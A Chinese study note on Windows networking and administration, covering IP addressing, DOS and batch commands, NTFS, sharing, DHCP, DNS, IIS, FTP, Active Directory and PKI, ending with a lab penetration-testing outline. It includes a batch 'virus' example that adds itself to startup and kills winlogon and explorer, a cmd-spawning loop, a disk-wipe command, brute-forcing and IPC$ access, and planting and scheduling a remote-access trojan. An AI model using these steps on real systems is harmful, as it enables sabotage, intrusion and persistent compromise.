网络通信原理-局域网、DOS、用户与组、远程、NTFS、文件共享、DHCP、DNS、WEB、FTP、域、PKI、扫描与爆破
目录
------------------------------------------------------------------------------
局域网:一般称为内网
单局域网构成:交换机,网线,pc
交换机:用来组建内网的局域网的设备,并不能让局域网上网,路由器只能实现连接内网和外网。
32位二进制
********.********.********.********
为了方便变为10进制: *.*.*.* (*的范围 0-255)
局域网通信规则:在同一个局域网中,所有IP必须在同一个网段才可以互相通信
IP构成:网络位 +主机位(网络位相同的IP地址,为同一个网段)
子网掩码:用来确定IP地址的网络位
子网掩码如何确定网络位: 与255对应的数字为网络位,与0对应的数字为主机位
子网掩码的个数
255.0.0.0
255.255.0.0
255.255.255.0
备注:子网掩码正确格式为连续的1和连续的零组成,两者不能穿插
如果0和1穿插的话,就会报错:
253.0=11111101.00000000
ISO定义五大类:(是以IP地址的第一位进行区分的)
A类:1-126 默认子网掩码:255.0.0.0
B类:128-191 默认子网掩码:255.255.0.0
C类:192-223 默认子网掩码:255.255.255.0
D类:224-239 组播地址
E类:240-254 科研使用
注:目前我们只能使用A、B、C类 子网掩码可以修改
每个网段的地址分三类:
1、主机位全为0 是该网段的名称
2、主机位为255 是该网段的广播地址
3、中间的可用地址
比如:
此地址的网段名称为192.168.0.0
此地址的广播地址为192.168.255.255
127.0.0.1 回环地址(跟自己通信)
网关:一个网络的出口,Gateway=GW,一般网关在路由器上
路由器:可以连接外网的设备
#pc向外发包的心理活动
1、首先判断目标IP与自己是否在 同一个网段
2、如在同一个网段,则直接发出去,不找网关
3、如不在同一个网段,则发包给网关
互联网的一项服务,它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。
ping 目标IP地址 #测试网络连通性,有去有回即为可以成功通路
ping -t 目标IP地址 #一直ping
ping -n 数字 目标ip地址 #修改ping包的数量(默认4)
ping -l 数字 目标ip地址 #修改ping 包的大小
手工解析域名
nslookup www.baidu.com
如何查看ip
ipconfig #查看ip基本信息
ipconfig /all #查看ip所有信息
客户机用域名访问网站的心理活动:
先看缓存、缓存没有看本地hosts文件、再没有才会问DNS服务器。
#1、命令: color fe
帮助:color ?
作用:改变背景及字体颜色
#2、命令: cls
作用:清屏
#3、命令:dir
作用:浏览当前文件夹的内容(带<dir>标识的为文件夹,否则为文件)
其他用法︰
dir 指定路径
dir d:\
dir d:\pic
dir /a 浏览所有内容,包括隐藏内容
dir *.* /b > case.txt #将文件夹下所有的文件名字保存到case.txt(在目标文件夹的路径中打开cmd )/b表示只显示文件名
#4、命令∶盘符
作用:切换分区,如: c:、d:、e:
#5、命令: cd..
作用:退出一级目录
#6、命令:cd文件夹名
作用:进入文件夹
#7、Tab键
作用:补全路径功能
#8、命令: cd \
作用:直接退到根目录
#9、命令 :md 文件夹〔文件夹1、文件夹2....]
作用:创建文件夹
#10、命令:rd 文件夹 [文件夹1、文件夹2...]
作用:删除空文件夹
命令:rd 文件夹 /s /q
作用:无提示删除非空文件夹
#11、路径
相对路径∶针对当前路径有效,如: ..\456
绝对路径:从根开始写路径,如: \123\345
#12、创建文件方法:
echo 字符串 >>[路径1]文件名.扩展名
echo后如果不加">"或">>"就表示在屏幕输出内容。
注释:>>和>都可以将命令的输出内容输入到某文件中,若文件不存在,则同时创建该文件 >>为追加 >为覆盖
案例∶修改hosts文件 echo 1.1.1.1 www.baidu.com >>c:\windows\system32\drivers\etc\hosts
#13、 清空磁盘
rd . /s/q
#14、浏览文件
type 文件名.扩展名 显示
type 文件名.扩展名 |more 分页显示
例如:dir c:\windows |more
#15、创建文件
1)echo
2) copy con 文件名.扩展名
开始编写内容
ctrl+z 回车结束编写
#16、删除文件
del *.txt 删除所有txt结尾的文件
del *.* 删除文件
del *.* /s/q 无提示删除
#17、文件夹属性操作
attrib +h 文件名 隐藏文件夹
attrib -h 文件名 取消隐藏文件夹
attrib +h +s +a 文件名 将文件夹隐藏设为系统文件
dir /a 显示当前磁盘所有包括系统文件
#18、快速生成一个空文件(有大小)
fsutil file createnew c:\system.ini 数字 在c盘创建文件指定文件大小(这里数字的单位是Byte)
#19、修改关联
assoc .txt=exefile 修改打开txt文件的程序 使其无法打开
assoc .txt=txtfile 恢复
#20、shutdown
shutdown -s -t 100 定时关机
shutdown -s -f -t 100 定时强制关机
shutdown -r -t 定时重启
shutdown -a 取消一切定时
shutdown -l 注销,同logoff命令相同
shutdown -s -f -t 100 -c "显示信息"
#20、重命名、移动、复制、获取文件名
ren 旧名 新名 重命名
move 原地址 新地址 移动
copy 原地址 目的地址 复制粘贴
方法:创建一个记事本文件,然后将其扩展改为.bat
批处理作用:自上而下成批处理每一条DOS命令,直到执行到最后一条,不管每条命令成功与否都会执行下一条命令。
#批处理语法
1、@echo off #关闭回显
2、title HK-9527v1.0 #设置程序名
3、pause #暂停屏幕
4、echo. #空一行
5、start #命令后可跟网页、某路径下的程序,如果什么都不填,那就是默认打开cmd
6、%*% #取变量*的值
7、Userprofile #是一个变量,存储的是登录用户的家目录
8、路径中有特殊符号的时候要加双引号
9、>nul 2>nul #清除一条命令执行后的系统反馈,如果有错误也不显示
10、set /p u=(字符串) #获取输入的字符,将其赋值给变量u
11、:3 #表示"3"区块
12、goto 区块名 #程序跳该区块
13、if "%num%"=="1" 命令1 #如果条件成立,执行命令1;条件不成立,跳过命令1,向下走
14、%0 #循环
start cmd
%0
这样就会无限打开cmd窗口
#几种特殊的cmd语句
ntsd -c q -pn winlogon.exe #蓝屏操作,强制指定杀死登录窗口程序(只针对2003)
taskkill /im explorer.exe /f #任务进程杀死命令,杀死命为explorer的进程,/f表强制
start C:\windows\explorer.exe #开启桌面进程
copy **.bat "%userprofile%\Start Menu\Programs\Startup" #将某个bat程序拷贝到启动项里(win10)
案例:设计一个好的小工具
@echo off
color 0a
title HK-9527工具箱
:mean
cls
echo==============HK-9527工具箱==============
echo.
echo 1、定时关机
echo 2、取消自动关机
echo 3、打开网页
echo 4、隐藏桌面
echo 5、显示桌面
echo 6、退出
echo.
echo=========================================
set /p a=请输入功能对应的序号
if "%a%"=="1" goto 1
if "%a%"=="2" goto 2
if "%a%"=="3" goto 3
if "%a%"=="4" goto 4
if "%a%"=="5" goto 5
if "%a%"=="6" goto 6
echo 输入错误请重新输入功能编号!
pause
goto mean
:1
set /p time=请输入定时:
shutdown -s -f -t %time%
goto mean
:2
shutdown -a
goto mean
:3
set /p url=请输入网址:
start %url%
goto mean
:4
taskkill /im explorer.exe /f >nul 2>nul
echo 桌面已被隐藏
pause
goto mean
:5
start C:\windows\explorer.exe
echo 桌面已开启
pause
goto mean
:6
exit
案例:设计病毒文件
copy 病毒.bat %userprofile%/启动文件路径
ntsd -c q -pn winlogon.exe
taskkill /im explorer.exe /f
windows服务器系统:win2000 win2003 win2008 win2012
linux服务器系统:Redhat Centos
每个用户有自己的唯一的SID(安全标识符)
用户SID:S-1-5-21-426206823-2579496042-14852678-500
系统SID:S-1-5-21-426206823-2579496042-14852678(电脑标识)
windows 系统管理员administrator的UID是 500,普通用户是1000 开始的
linux 系统管理员root 的UID是 0,普通用户是1000开始
账号密码存储的位置 : C:\windows\system32\config\SAM(暴力破解,撞库)
windows系统上,默认密码最长有效期42天(尤其是服务器系统)
#查看用户的SID
cmd---whoami /user
(1)内置账户
给人使用的:
administrator 管理员账号
guest 来宾账户
普通用户没有关机权限(因为服务器轻易不关机),来宾账户一注销,配置文件就被删除了
计算机服务组件:
system 系统账户,权限至高无上
local services 本地服务账户 普通权限
network services 网络服务账户 普通权限
(2)配置文件
每个用户都有自己的配置文件(家目录),在用户第一次登录时自动产生,路径是∶
win7/win2008在 C:\用户\
xp/win2003在 C:\Documents and Settings\
(3)账户dos命令
1.net user #查看账户列表
2.net user 账户名 字符串 #修改密码
3.net user 账户名 #查看账户信息
4.net user 账户名 密码 /add #新建账户
5.net user 账户名 /del #删除账户
6.net user 账户名 /active:yes/no #激活或禁用账户
组的作用:简化权限赋予,N多人在一个组有相同的权限。
赋权限方式:
①用户 - 组-赋权限
②用户 - 赋权限
内置组(系统自带组)内置组的权限已经被系统赋予
administrators #管理员组
guests #来宾组
users #普通用户组
Network Configuration Operators #网络配置组
print #打印机组
Remote Desktop #远程桌面组
组DOS命令
1.net localgroup #列出组列表
2.net localgroup 组名 #查看组成员
3.net localgroup 组名 /add #创建组
4.net localgroup 组名 用户名 /add #添加组成员
5.net localgroup 组名 用户名 /del #删除组成员
6.net localgroup 组名 /del #删除组
把某个成员从users组中拉到administrators组中称为提权,把某个成员从administrators组中拉到users组中称为降权。
将XP与Win2003搭载到一台交换机上
给XP、Win2003配置同一网段的ip地址
在Win2003上打开远程连接
在Win2003创建用户,并为用户添加远程连接组权限
在Xp上输入mstsc进行连接
过程:
#服务器上创建远程连接账户
net user test test /add
net localgroup "Remote Desktop Users" test /add
net localgroup "Remote Desktop Users"
在以上的基础上加上以下操作
在服务器中开启telent服务
将远程连接账户添加进telent组
net user test test /add
net localgroup TelnetClients test /add
net localgroup TelnetClients
之后在Xp上进行命令行连接
注意:win10客户机进行命令连接的时候必须开启telnet客户端
控制面板--程序--启用或关闭windows功能---勾选Telne客户端
telnet 10.1.1.2
输入账号密码
跳转到的cmd窗口就是已经连接上的服务器的窗口
netstat -an
(1)通过设置NTFS,实现不同用户访问对象(文件,文件夹)的不同权限
(2)分配了正确访问权限后,用户才能访问不同的权限
(3)设置权限防止资源被篡改、删除
文件系统即在外部存储设备上组织文件的方式
如果一个分区不建立文件系统,就无法存储文件,我们所说的格式化,就是制作文件系统
常见的文件系统
FAT windows
NTFS windows(最新的文件系统类型)
EXT linux常见
**.txt指向某一个簇,我们再去调取簇里面的内容才能完成对文件的操作,一个簇里面只能存放一个文件,所以会造成浪费。
如果硬盘存放的是小而琐碎的文件,那么分配簇越小越好,指针读取的次数增多,速度变慢。
如果硬盘存放的是大而单一的文件,那么分配簇越大越好,指针读取的次数减少,速度变快。
1、提高磁盘读写性能
2、可靠性
加密文件系统
访问控制列表(设置权限)ACL
3、磁盘利用率
压缩
磁盘配额(给不同的用户可以使用的磁盘额度)
4、支持单个文件大于4个G
8.4.1、取消继承
作用:取消后,可以任意修改权限列表
方法:文件右键属性 - 安全 - 高级
8.4.2、文件及文件夹权限
8.4.3、权限累加
当用户同时属于多个组,权限是可以累加的。
这里要注意创建新用户时,新用户默认是被添加到Users组的
8.4.4、拒绝最大
当用户权限累加时,遇到拒绝权限,拒绝最大
8.4.5、取得所有权
8.4.6、强制继承
作用 :对下强制继承父子关系
8.4.7、文件复制剪切对权限的影响
同分区移动(剪切,不是复制)文件,文件的权限不会被目标文件的权限覆盖,其余的操作都会被目标文件的权限覆盖。
其余的操作,比如跨分区复制、移动文件,同分区复制文件。
cifs -微软开发-对内偏多(公司员工之间)
ftp -全球通用-对外偏多(公司客户之间)
方法:文件夹右键属性--共享--开启共享--设置共享名--设置共享权限
(1)在本地登录时,只受NTFS权限的影响
(2)在远程登录时,将受共享及NTFS权限的共同影响,且取交集
(3)所以建议设置共享权限为everyone完全控制,然后具体的权限在NTFS中设置即可
注意:test1在homework文件夹里有写入权限,当写入文件的名字与homework文件夹中文件的名字冲突时,是写入不成功的,除非与之冲突的文件也是自己刚刚上传的。
在开始运行或我的电脑地址栏中,输入UNC地址(\\+ip):
①文件共享服务器IP
②文件共享服务器IP\共享名
注意是共享名,不是文件名
注意:Win10系统需要开启WindowsSMB功能
在分享时将分享名后输入$符号
这样其他用户访问时此文件夹将自动被隐藏
若要查看隐藏分享文件夹,可以手动地址栏后输入隐藏文件夹名
手动地址栏后输入隐藏文件夹名之后:
1、net share #列出共享列表
2、net share 共享名 /del #删除文件的共享功能,并不会删除原文件
3、net share case$=C:\ #创建共享名为case$,共享资源为C:\的命令
4、netstat -an #查看本地网络连接状态和已开启的端口服务
9.6.1、修改注册表
(1)注册表
注册表相当于一个城市中公安系统的户籍科,户籍科寻访的都是每个公民的详细信息,那么注册表中存放的都是注册信息、软件信息等。
重装系统之后因为删除了注册表,所以装在其他盘里的软件都变成了黑户,所以多少在使用的过程中会出现问题。
打开注册表编辑器 :打开运行 、regedit
(2)定位共享注册表位置
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
右键新建REG_DWORD类型的 AutoShareServer 键,值为0
这样就可以屏蔽系统自动产生的隐藏共享
9.6.2、关闭445服务
可以通过关闭445端口来达到关闭 IPC$,可以屏蔽病毒传入(如:勒索病毒等)
方法一:打开services.msc ,并停止及禁用server服务
方法二:禁止被访问445,配置 高级安全防火墙 - 入站规则(win7、win2008及以上系统)
备注:一个服务对应一个端口
3389 # 远程桌面
23 # telnet
445 # 共享服务
10.1、DHCP作用(Dynamic Host Configuration Protocol)
DHCP(动态主机配置协议)是一个局域网的网络协议,指的是由服务器控制一段IP地址范围,客户机登录服务器时就可以自动获得服务器分配的IP地址和子网掩码
地址池/作用域:(IP,子网掩码,网关,DNS,租期),DHCP 协议端口是 UDP 67,68
减少工作量,避免IP冲突,提高地址利用率。
称为DHCP租约过程,分为4个步骤:
①客户机发送DHCP Discovery 广播包
客户机广播请求IP地址(包含客户机的MAC地址)
②服务器响应DHCP Offer广播包
服务器响应提供的IP地址(但无子网掩码、网关等参数)
③客户机发送DHCP Request广播包
客户机选择IP(也可认为确认使用哪个IP)
④服务器发送DHCP ACK 广播包
服务器确定了租约,并提供网卡详细参数IP、掩码,网关、DNS、租期等
ACK (Acknowledge character)即是确认字符
Dhcp每次的租期时间是由我们搭建服务器的时候设置的,具体的时间视情况而定。
例如KFC等商家,越短越好,如果设置为1年的租期,那么即使用此ip的人离开了,那个ip也不能用,必须等到租约到期时才能收回ip地址。
50%过后,客户机会再次发送DHCP Request包,进行续约,如果服务器无响应,则继续使用并在87.5%时,再次发送DCHP Request包,进行续约,如服务器任然无响应,就释放IP地址,并重新发送DHCP Discovery 广播包来获取IP地址,当无任何服务器响应时,自动给自己分配一个169.254.X.X/16(255,255,0,0),全球统一无效地址,用于临时局域网的内网通信!
Windows、Linux、三层交换机、路由器都可以做DHCP服务器。
第一步:交换机配好、ip配好(客户机自动获取ip,服务器手动输入ip)
第二步:软件装好
第三步:创建地址池、作用域
备注:
网关和DNS为此作用域的选项
虚拟机这个软件在第一天装好之后,他在虚拟的v1、v8交换机上都偷偷的藏了一台虚拟的DHCP服务器,所以如果选择了V1、V8交换机就需要把虚拟机自身的DCHP关掉
在安装软件的时候需要将服务器的ip地址进行手动写入,不然就会出现以下错误:
等待安装完成后打开DHCP界面:开始---管理工具---DHCP
服务器验证:
DCHP服务器对应的端口号为UDP 67,68
DHCP服务器搭建完成后,就可以给客户机进行沟通了,我们在客户机上输入ipconfig /all:
客户机验证:
客户机即使关机了,只要租约期限没有到期,那么这个ip就不会被收回,只有到租约期限结束时,才会收回,但是如果客户机主动释放ip,那么此ip就会立即被收回到作用域中。
ipconfig /release #释放IP(取消租约,或者改为手动配置IP,也可以释放租约)
ipconfig /renew #重新获取IP(有IP时,发送Request续约,无IP时,发送Discovery重新获取)
对指定的MAC地址,把动态分配的IP地址固定
比如:在公司里,老板获取的ip是固定值,回到家之后电脑自动获取ip
那么老板那边的ipconfig /all 就是我们刚刚设置的:
作用域选项是用来添加DNS、网关等信息
如果创建多个作用域时,暂时不填写DNS信息,等作用域创建完成后,在服务器选项中进行创建DNS信息,这样在服务器选项中创建的信息就会应用到每个作用域中
但是 作用域选项的优先级 > 服务器选项的优先级,在服务器选项设置了DNS、作用域也设置了DNS,那么优先使用作用于设置的。
服务器选项设置:
设置之后作用域的DNS都变成了 114.114.114.114
再进行作用域选项设置:
可以看到设置后的DNS为8.8.8.8,所以作用域选项的优先级 > 服务器选项的优先级
备注:
服务器的地址必须和提供的地址在同一网段。
每个作用域的网关必须对应作用域的网段,所以不可以在服务器设置中设置网关。
①攻击DHCP服务器:频繁的发送伪装DHCP请求,直到将DHCP地址池资源耗尽
防御:在管理型交换机端口上做动态MAC地址绑定
②伪装DHCP 服务器攻击:hack通过将自己部署的DHCP服务器,为客户及提供非法IP
防御:在交换机上(管理型),除合法的DHCP服务器所在的接口外,全部设置为禁止发送DHCP Offer包
Domain Name Service
域名服务
作用:为客户机提供域名解析服务
如“www.sina.com.cn”是一个域名,从严格意义上来说“sina.com.cn”才被称为域名(全球唯一),而“www”是主机名
“主机名.域名”称为完全限定域名(FQDN),一个域名下可以有多个主机,域名全球唯一,那么“主机名 .域名”肯定也全球唯一。
以"sina.com.cn"域名为例,一般管理员在命名其主机的时候会根据其主机的功能而命名。
比如网站的是www,博客的是blog,论坛的是bbs,那么对应的FQDN为www.sina.com.cn , blog.sina.com.cn , bbs.sina.com.cn。
这么多个FQDN,然而我们只需要申请一个域名即"sina.com.cn"即可,FQDN=主机名.DNS后缀(完整合格的域名).
www.baidu.com.
". " 为根域
".com" 为顶级域
"baidu" 为一级域名
"www" 为主机名
TCP53
UDP53
(1)递归查询:客户机与本地DNS服务器之间
(2)迭代查询:本地DNS服务器与根等其他DNS服务器的解析过程
下图中的本地DNS服务器为直接提供服务解析的服务器,不是在公司内部的DNS服务器。
(1)正向解析:已知域名,解析IP地址
(2)反向解析:已知IP地址,解析域名
然后我们对客户机进行DNS配置,并对www.baidu.com的域名进行解析,结果就是我们刚才设置的1.1.1.1
ipconfig /flushdns #清空本地DNS缓存
ipcpnfig /displaydns #查看本地DNS缓存
将xp与2003桥接上网,部署2003为DNS服务器,xp指向2003,并能实现xp正常上网
wmware中的vmnet0代表的是真实的交换机,开启之后的原理图如下:
开启之后,我们的虚拟机xp和虚拟机2003都会直接连接到我们真实生活中的交换机上,那么我们就可以将2003作为DNS服务器,虚拟机xp作为客户机实现现实生活中的场景。
开启vmnet0的配置:
将客户机XP的DNS配置为2003的ip地址,然后在xp上进行ping操作,发现可以成功,原理为迭代查询:
在2003服务器上修改www.baidu.com的ip地址,结果如下:
虚拟机Vmnet口解释:
是指在大部分的 DNS 搜索中,客户机一般执行正向搜索。
DNS 同时提供反向搜索,允许客户机根据一台计算机的IP 地址搜索它的DNS名称。
如下图,在没有设置反向解析的时候,server为unknow
下面开始设置反向解析:
我们将服务器名设置为hk.server,下面在进行解析就不是unknow了,就是我们设置的hk.server
成功备份区域解析记录
如下图,用户使用188.188.188.1解析www.hk9527.com可以成功,配置辅助DNS服务器之后,用户使用188.188.188.2解析www.hk9527.com也可以成功。
然后我们在188.188.188.2的服务器上搭建www.jd.com的DNS,解析到7.7.7.7
再次在客户机上进行解析就可以得出7.7.7.7的结果。
例如zoom.hk9527.com的别名为z.hk9527.com,那么访问z.hk9527.com也可以转到zoom.hk9527.com
同理,www.hk9527.com也可以起别名为w.hk9527.com
最后一行的Aliases就表示别名的意思。
客户机处理DNS请求顺序:DNS缓存 --> 本地hosts文件 --> 找本地DNS服务器
服务器处理DNS请求顺序:DNS高速缓存 --> 本地区域解析文件 --> 转发器 --> 根
A记录:正向解析记录
PTR记录:反向解析记录
CNAME:别名
MX:邮件交换记录
NS:域名服务器解析
主要名称服务器、辅助名称服务器、根名称服务器(13个根)、高速缓存名称服务器
(1)WEB服务器也称网页服务器或HTTP服务器
(2)web服务器使用的协议是HTTP或HTTPS
(3)HTTP协议端口号:TCP 80、HTTPS协议端口号:443
(4)WEB服务器默认站点路径:C:\Inetpub\wwwroot
(5)WEB服务器发布软件:
微软:IIS(可发布web网站和FTP站点)
Linux:Apache/LAMP/Tomcat/Nginx.etc
第三方:phpstudy、XAMPP
(1)配置静态IP地址
(2)安装IIS-WEB插件
(3)停用默认站点
(4)新建网站--地址端口绑定--指定站点路径--设置权限
(5)设置默认文档(设置首页)
(6)客户机测试访问
(1)不同IP,相同端口
本地连接--属性---Internet协议---高级,将第二个网站指向的ip地址添加进去。
创建第二个网站,将网页文件改为第一位:
这样既可以成功访问,达到不同ip、相同端口的效果
(2)相同IP,不同端口(测试)
创建网站时,将端口号改为8080,这里端口号可以随便填,但是尽量不要填1000以下的。
创建完后将文档顺序调整一下
这样就可以达到同ip不同端口访问,这里要注意访问页面的时候需要加上端口号
(3)相同IP,相同端口,不同域名(DNS主机头)
首先,先要在DNS服务器上创建两个域名,这两个域名指向同一个ip
然后,在IIS管理器上将这两个域名分别分配给两个网站。
这样可以达到相同IP,相同端口,不同域名访问
备注:
如果绑定域名了,那么再利用ip进行访问就不可行了,即使停掉其中一个网站用ip也访问不了,此时只能再进行添加一个没有主机头部的标识
但是这种方法只能用于一个站点,因为有多个站点就会重复了。
(1)静态网站:一般扩展名为.html或.htm
无法与后台数据库进行互动
(2)动态网页:一般扩展名为.asp或.php
有后台数据库,asp或php可以连接前台页面与后台数据库
Asp一般在微软平台可以运行,Linux里没有这个语言,Linux一般用php
(1)开启web服务拓展
(2)新建DNS区域
(3)新建网站
(4)启用父路径
启用父路径之后,此站点下的子文件夹也可以访问
(5)调整显示文档顺序
访问结果:
File Transfor Protocol 文件传输协议
端口号:TCP 20/21
(1)配置静态IP
(2)安装IIS-ftp软件(上文安装web插件时已经安装过了,这里不再演示)
(3)使用默认站点或创建新的站点
注意:用户最终权限为FTP权限与NTFS权限取交集,建议FTP权限全部勾选,然后具体在NTFS里做!
(4)去掉匿名登录
(5)为ftp创建用户,并设置文件夹的NTFS权限
Win10设置FTP需要先进行几步设置
在客户机连接FTP的时候是在文件夹中输入FTP:\\ IP地址,然后按回车。
(1)主动模式
21端口:控制端口、20端口:数据端口
(2)被动模式
21端口:控制端口、随机端口:数据端口
主动与被动阐述的是数据传输过程,都是对于服务器而言的
主动模式中是20端口主动连接1024端口,被动模式中是4088端口被2048端口连接
选择主动模式还是被动模式的选择权在客户机手里
不管是客户机还是服务器只要开了防火墙,防火墙都会自动关闭一些端口号,这样别人就访问不了了,但是防火墙不会拦截主机端口主动连接的请求,对方回包也不会被拦截,相当于建立了传输通道。
如果服务器开了防火墙,那就必须使用主动模式,且必须让服务器的防火墙开放21、20端口
如果客户机开了防火墙,服务器没开,则使用被动模式
万能法则:客户机是我们可以操控的,关掉客户机防火墙,选择主动模式。
(1)工作组:默认模式,人人平等,不方便管理
(2)域:人人不平等,集中管理,统一管理
① 域控制器:DC(Domain Controller),简称"域控”,是这个域的老大
② 成员机(成员及之间还是平等的)
(1)安装域控制器就生成了域环境
(2)安装了活动目录就生成了域控制器
(3)活动目录:Active Directory = AD
装DC的时候必须将DNS也同时部署
在新用户加入域环境的时候DNS会自动创建一个A记录
有域的情况下,公司员工必须指向公司自己的DNS服务器,也就是DC服务器
(1)活动目录简称AD,存储公司的总资源,是域里面的核心,所以域也叫AD域
(2)特点:域之所以可以实现集中管理/统一管理,都是因为AD的作用
安装windows其他组件的时候win2008不需要插光盘,系统已经将所有的安装包存储到电脑里了
两种办法:
(1)我的电脑---管理---属性---角色---添加角色
(2)开始--运行--输入dcpromo,安装活动目录
①开启2008虚拟机,并桥接到某个特定的网卡
②配置静态IP地址188.188.188.1/24
③开始--运行--输入dcpromo,安装活动目录
弹出向导---勾选DNS---新林中新建域---功能级别都设置为win2008域的FQDN---设置目录服务还原密码
④在DC登录域HK9527 \ Administrator,DC的本地管理员升级为域管理员
⑤验证AD是否安装成功
1-计算机右键属性--所属域
2-DNS服务器中是否自动创建HK9527.com区域文件
3-自动注册DC的域名解析记录
4-开始--管理工具--AD 用户和计算机
Computer:普通域成员机列表
Domain Controllers:DC列表
Users:域帐号
(卸载域:先将成员及全部剔除域,再将活动目录卸载,命令也是dcpromo)
(1)配置IP,并指DNS
(2)计算机右键属性--更改--加入HK9527.COM域
(3)重启加入域后,成功使用用户登录成员机
(1)加入域不成功
网络是不是不通
解析是否成功解析
是否为DNS缓存问题
(2)登入域不成功
如XP,如果已勾选登录域HK9527,就不用再写hk9527.com\xiaoke.zhao
(3)域用户的权限
普通域账号登录别的客户机虽然可以登录,但是没有完全控制权限。
如果想让普通域账号在别的客户机上拥有完全控制权限,但是又不想将这个普通域账号提升为域管理员,这个时候可以将这个普通域账号添加到本地管理员组,也就是Administrators
本地管理员组:Administrators、域管理员组:Domain Admins
作用:用来归类域资源(域用户、与计算机、域组)
组和OU的作用都是用来分类的,都可以理解为容器,但是组的目的是赋权限,OU的目的是下发组策略
新建OU:
开始---管理工具---Active Directory 用户和计算机
将用户加入到OU里:
在加入OU里的时候注意,可以将此账户所在的计算机也加入到OU里
用户和计算机一个是限制用户,一个是限制计算机
例如在组策略里将赵小可V这个用户的桌面改为特定图片,那么赵小可v去哪个计算机上都会是特定的计算机
如果将此计算机的桌面设定为特定桌面,那么只要是在这个计算机上登陆的用户都会是这个桌面
如果域组策略和本地组策略冲突时,本地组策略的权限最低
作用:通过组策略可以修改计算机的各种属性,如开始菜单、桌面背景、网络参数等。
重点:组策略在域中,是基于OU来下发的!
比如想要限制“财务部”的桌面,那么就需要在财务部的OU里写一个组策略
开始---管理工具---组策略管理
①表示为整个域的组策略,也就是说如果想对域里面所有的电脑进行操作,就需要在这个组策略里修改
②表示为整个DC的组策略,也就是说如果想对域里面所有的DC进行操作,就需要在这个组策略里修改
新建组策略:
LSDOU(策略优先级)
L=本地组策略
S=站点(林)
D=域的总组策略
OU=一系列OU的组策略(HK9527集团组策略---市场部组策略---北方市场部组策略,都会读取)
在应用过程中,如果出现冲突,后应用的生效
编辑组策略:将北方市场部的桌面改为特定桌面(注意客户机需要成功加入域、域账号加入到了北方市场部里)
注意:下图中的墙纸地址应该创建一个共享文件,注意共享文件的权限与NTFS权限相交问题
结果:使用加入北方市场部的域账号进行登录,发现桌面已成功设置
组策略的阻止继承及强制
强制:在应用顺序(LSDOU)中应用到此策略为止,后面的策略就不用看了
组织继承:上级所有的OU对我没有任何影响,使用的是自己独有的策略
注意:强制是对组策略右键进行设置,组织继承是对OU右键进行设置
**********正常情况下:LSDOU顺序
上级OU: 桌面:aa 、运行:删除
下级OU: 桌面:未配置 、运行:不删除
下级OU用户结果:桌面:aa、 运行:不删除
*********下级OU设置了组织继承:
下级OU用户结果:桌面:未配置、 运行:不删除
××××××上级设置了强制:
下级OU用户结果:桌面:aa、 运行:删除
注意:当上级强制和下级阻止继承同时设置,强制生效!
查看当前组策略都设置了那些策略:
选中相应的组策略表---右键编辑
(1)添加脚本组策略
(2)去除Ctrl+Alt+Del键
(3)添加密码策略
实验注意事项:
1、DC部署完毕之后,需要将DNS修改为如下状态
2、使用域账号登录2003服务器,部署DHCP时,需要右键授权
3、部署WEB时,如果是动态网站记得启用父路径,并允许动态网站插件安装
4、网站搭建好之后,需要域名的解析服务,要将此域名要加入到DNS服务器中
5、在win7客户机登录网站时,刷新一下dns缓存 ipconfig /flushdns
0.授权
1.信息收集
nslookup、whois
2.扫描漏洞
namp=ip 范围 端口 80(IIS,apache,什么网站)scanport
高级扫描:如IIS漏洞2003-IIS6.0、 2008-IIS7.0
扫描网站漏洞
3.漏洞利用
4.提权(shell环境、桌面环境、最高权限)
5.毁尸灭迹(清除日志)
6.留后门
7.渗透测试报告
telnet IP地址 测试端口
已知2003服务器的用户名为administrator,要求渗透此服务器
由图可知188.188.188.2的445端口开放
可知暴力破解的密码为:root
net use f: \\10.1.1.2\c$ 密码 /user:用户
net use f: \\10.1.1.2\share 密码 /user:用户
net use \\10.1.1.2\ipc$ 密码 /user:用户 #IPC$的写法
net use f: /del
net use * /del
ipc$只有共享名,没有物理路径,所以也称为空链接。建立成功之后可以通过过命令行对整个服务器进行操作,命令行中需要写网络路径
注意:开机重启之后这条net use就会显示不可用状态,需要重新建立连接,如果设置映射后,下次重启之后也是可用的
我的电脑---右键---映射网络驱动器
利用光盘上的灰鸽子软件
将木马文件copy到服务器中
net time \\188.188.188.2 #查看188.188.188.2的时间
at \\188.188.188.2 12:45 "c:\xx.exe" #让188.188.188.2在12:45执行xx.exe文件
at \\188.188.188.2 #查看188.188.188.2所有的定时计划
at #查看本机所有的定时计划
设置定时计划
名称:Public Key Infrastructure 公钥基础设施
作用:通过加密技术和数字签名保证信息的安全
组成:公钥加密技术、数字证书、CA、RA
机密性、完整性、身份验证/操作的不可否认性
1)SSL/HTTPS
2)IPsecVPN
3)部分远程访问VPN
作用:实现对信息加密、数字签名等安全保障
加密算法:
(1)对称加密算法
x+5=y(对称加密算法)
x是原数据/原文、y是密文、5是key/密钥
加解密的密钥一致,如果密钥丢失则非常危险。
DES 3DES AES
(2)非对称加密算法(公钥加密,私钥解开 / 私钥加密,公钥解开)
① 通信双方各自产生一对公私钥
② 双方各自交换公钥
③ 公钥和私钥为互相加解密关系
④ 公私钥不可互相逆推
RSA DH
HASH算法:MD5 SHA (验证完整性)
HASH值可逆么?不可逆!
HASH值=摘要
数字签名:用自己的私钥对摘要加密得出的密文就是数字签名
证书用于保证公密的合法性
证书格式遵循X.509标准
数字证书包含信息:
1.使用者的公钥值
2.使用者标识信息(如名称和电子邮件地址)
3.有效期(证书的有效时间)
4.颁发者标识信息
5.颁发者的数字签名
数字证书由权威公正的第三方机构即CA签发,CA是权威证书颁发机构,为了公正“公钥”的合法性!
机密性:使用对方的公钥加密
身份验证/数字签名:使用自己的私钥加密
验证CA过程:
实验环境:
1、win2008作为https服务器:188.188.188.1/24
2、win7作为客户机:188.188.188.2/24
3、桥接到虚拟网络vmenet2
实验步骤:
1、将2008与win7调节到同意VMnet下,配置IP
win2008:188.188.188.1 (2008的dns需要手动指向自己127.0.0.1)
win7:188.188.188.2(win7的dns需要手动指向188.188.188.1)
2、win2008下 我的电脑---右键管理---角色---添加角色---勾选web服务器(IIS)---勾选应用程序开发---完成安装
3、打开安装好的IIS---新建网站(不能删除Default Web Site)---修改默认页面
安装CA时,CA自带了一套网络站点,此CA站点就会自动征用Default Web Site站点路径
4、win2008下 安装DNS,我的电脑---右键管理---角色---添加角色---勾选DNS服务器---完成安装---打开DNS---新建区域---新建主机名
